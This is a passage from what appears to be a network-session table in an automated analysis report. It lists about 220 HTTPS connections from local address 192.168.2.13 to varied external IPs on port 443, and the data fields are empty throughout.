                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18599192.168.2.133535237.255.8.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18600192.168.2.135209417.161.73.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18601192.168.2.1360328163.66.177.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18602192.168.2.134178294.207.82.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18603192.168.2.1335728123.23.42.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18604192.168.2.1356662161.205.55.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18605192.168.2.1353034199.160.126.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18606192.168.2.1348714145.3.108.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18607192.168.2.1359022176.166.165.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18608192.168.2.1357410146.163.203.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18609192.168.2.1349654135.190.27.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18610192.168.2.1352232123.186.119.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18611192.168.2.1335284213.123.106.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18612192.168.2.1360546104.112.58.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18613192.168.2.134914825.201.56.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18614192.168.2.134034292.170.101.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18615192.168.2.1354582174.207.214.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18616192.168.2.1358944130.252.111.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18617192.168.2.1336692213.173.108.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18618192.168.2.135813868.119.195.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18619192.168.2.1339656136.62.199.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18620192.168.2.135145858.7.207.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18621192.168.2.135791864.122.94.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18622192.168.2.135725695.3.41.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18623192.168.2.1335182172.243.44.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18624192.168.2.1356284172.47.196.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18625192.168.2.1353446123.210.145.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18626192.168.2.1338240154.197.110.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18627192.168.2.135986646.58.76.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18628192.168.2.1335566153.98.155.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18629192.168.2.13537768.241.164.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18630192.168.2.13362588.131.183.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18631192.168.2.1332984195.206.16.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18632192.168.2.1340300221.52.25.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18633192.168.2.134929296.105.16.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18634192.168.2.135132654.171.195.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18635192.168.2.1353004120.110.133.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18636192.168.2.1338636197.111.123.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18637192.168.2.1340992105.160.93.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18638192.168.2.134692096.27.221.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18639192.168.2.1355610177.113.71.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18640192.168.2.1347874119.203.250.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18641192.168.2.133479296.49.60.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18642192.168.2.1336966166.16.252.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18643192.168.2.1351952153.196.77.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18644192.168.2.1355628179.180.178.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18645192.168.2.133936861.30.62.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18646192.168.2.133682450.209.38.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18647192.168.2.1348684155.154.36.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18648192.168.2.1336146100.234.247.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18649192.168.2.134880812.45.59.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18650192.168.2.135593035.146.241.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18651192.168.2.134299677.221.243.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18652192.168.2.1337238100.247.170.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18653192.168.2.1336056199.92.105.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18654192.168.2.1359640138.89.232.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18655192.168.2.1346924203.114.167.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18656192.168.2.1340902188.12.14.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18657192.168.2.133594643.90.96.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18658192.168.2.134389072.88.49.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18659192.168.2.133862614.100.5.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18660192.168.2.134753238.172.71.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18661192.168.2.134816246.157.236.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18662192.168.2.136023674.7.62.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18663192.168.2.1344922118.196.101.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18664192.168.2.133684279.239.140.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18665192.168.2.1349058199.151.62.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18666192.168.2.134807638.51.208.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18667192.168.2.135487881.93.92.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18668192.168.2.134544253.84.66.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18669192.168.2.1350044178.157.9.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18670192.168.2.1333398122.104.15.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18671192.168.2.1341744140.109.236.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18672192.168.2.1345132163.218.65.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18673192.168.2.1347966169.96.184.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18674192.168.2.135278231.38.81.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18675192.168.2.1337300180.132.11.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18676192.168.2.133982259.149.251.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18677192.168.2.1355878117.3.115.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18678192.168.2.1355264217.114.32.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18679192.168.2.1355470113.70.224.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18680192.168.2.135250480.62.249.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18681192.168.2.134594444.16.185.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18682192.168.2.13430901.162.5.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18683192.168.2.1346810120.91.225.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18684192.168.2.135781084.45.64.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18685192.168.2.1341104123.20.222.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18686192.168.2.1349014118.17.220.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18687192.168.2.133835637.38.157.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18688192.168.2.1348774130.9.40.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18689192.168.2.1336804140.56.26.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18690192.168.2.1359032188.104.105.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18691192.168.2.1347418178.71.237.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18692192.168.2.135026619.179.220.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18693192.168.2.1348606164.19.244.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18694192.168.2.1354544115.210.191.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18695192.168.2.135667644.55.194.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18696192.168.2.1352646112.157.31.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18697192.168.2.1353158124.4.153.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18698192.168.2.1349310128.227.219.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18699192.168.2.1344654208.81.182.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18700192.168.2.135102082.198.59.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18701192.168.2.133509473.114.155.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18702192.168.2.134832684.165.131.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18703192.168.2.1341306111.19.6.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18704192.168.2.1347940163.115.130.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18705192.168.2.1357284208.227.44.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18706192.168.2.1339514162.234.124.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18707192.168.2.1351850112.224.123.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18708192.168.2.136063452.140.147.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18709192.168.2.135324466.212.206.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18710192.168.2.1358924169.15.184.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18711192.168.2.133404442.47.99.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18712192.168.2.133803892.219.136.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18713192.168.2.1337456223.228.220.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18714192.168.2.134881666.216.246.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18715192.168.2.1355728126.245.96.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18716192.168.2.135641847.243.133.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18717192.168.2.13467469.89.11.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18718192.168.2.1360616156.151.185.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18719192.168.2.1354868146.171.24.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18720192.168.2.1348486168.95.6.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18721192.168.2.133619242.215.32.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18722192.168.2.1346916207.6.194.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18723192.168.2.1340378113.167.50.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18724192.168.2.133452849.83.26.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18725192.168.2.1359252200.237.140.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18726192.168.2.1347420155.85.156.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18727192.168.2.1348482168.174.235.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18728192.168.2.1342344118.124.196.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18729192.168.2.1346540126.59.2.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18730192.168.2.133484024.252.89.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18731192.168.2.1356496141.11.204.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18732192.168.2.1344860172.140.17.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18733192.168.2.1350682187.121.149.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18734192.168.2.134389861.211.158.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18735192.168.2.134582691.143.223.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18736192.168.2.1355352223.116.228.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18737192.168.2.1336670128.102.114.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18738192.168.2.135732894.28.6.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18739192.168.2.133331244.99.231.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18740192.168.2.1348184199.222.148.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18741192.168.2.135073242.143.204.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18742192.168.2.1356596170.215.178.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18743192.168.2.134854896.80.62.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18744192.168.2.134542032.133.57.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18745192.168.2.133528863.112.53.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18746192.168.2.135737492.201.178.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18747192.168.2.133432889.232.142.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18748192.168.2.1338046114.223.201.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18749192.168.2.135809682.13.44.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18750192.168.2.1353442119.200.46.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18751192.168.2.134727424.234.26.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18752192.168.2.1350906161.138.203.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18753192.168.2.13368628.232.245.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18754192.168.2.1341790104.19.174.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18755192.168.2.1353464114.236.62.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18756192.168.2.133983838.202.87.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18757192.168.2.1356702118.67.47.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18758192.168.2.1359050167.106.81.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18759192.168.2.1354954201.127.2.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18760192.168.2.1348272205.103.152.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18761192.168.2.1335268161.81.209.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18762192.168.2.135541888.147.59.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18763192.168.2.1357792164.250.104.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18764192.168.2.1346458199.223.242.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18765192.168.2.1335418194.235.226.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18766192.168.2.1352840140.32.214.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18767192.168.2.1358358207.213.80.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18768192.168.2.1360474152.129.27.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18769192.168.2.134886499.3.49.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18770192.168.2.1345286157.209.105.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18771192.168.2.135603088.153.3.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18772192.168.2.134655848.172.184.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18773192.168.2.1357942150.248.77.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18774192.168.2.1333052195.111.85.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18775192.168.2.1356832207.214.67.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18776192.168.2.1346432133.131.235.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18777192.168.2.1342446207.61.206.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18778192.168.2.133647220.172.57.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18779192.168.2.1342716223.6.191.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18780192.168.2.133371063.44.194.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18781192.168.2.135651438.152.245.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18782192.168.2.1347488186.135.52.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18783192.168.2.134218231.22.192.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18784192.168.2.134128477.157.218.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18785192.168.2.1347200144.160.120.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18786192.168.2.1345198100.131.190.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18787192.168.2.133999891.104.215.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18788192.168.2.1357976218.124.72.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18789192.168.2.133957077.225.31.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18790192.168.2.135425292.253.32.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18791192.168.2.1347476140.52.125.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18792192.168.2.1355666120.223.186.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18793192.168.2.13404988.49.236.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18794192.168.2.135659881.14.150.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18795192.168.2.1351314124.121.251.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18796192.168.2.1340910125.155.153.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18797192.168.2.134399646.213.36.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18798192.168.2.1353732155.229.46.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18799192.168.2.134393042.230.190.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18800192.168.2.134593294.112.18.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18801192.168.2.134171274.64.4.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18802192.168.2.135334625.8.17.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18803192.168.2.1346440129.54.37.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18804192.168.2.1340868107.108.61.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18805192.168.2.1352750165.192.133.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18806192.168.2.134381069.166.203.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18807192.168.2.135944614.74.95.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18808192.168.2.134066890.229.186.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18809192.168.2.1337276147.6.116.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18810192.168.2.1360126142.53.206.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18811192.168.2.135739685.54.130.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18812192.168.2.1342288201.201.123.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18813192.168.2.1353032150.107.59.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18814192.168.2.1358818154.212.139.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18815192.168.2.1347244193.78.201.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18816192.168.2.1349438170.55.127.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18817192.168.2.133885846.181.10.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18818192.168.2.1334066218.18.111.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18819192.168.2.135449485.28.207.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18820192.168.2.133601890.146.13.129443
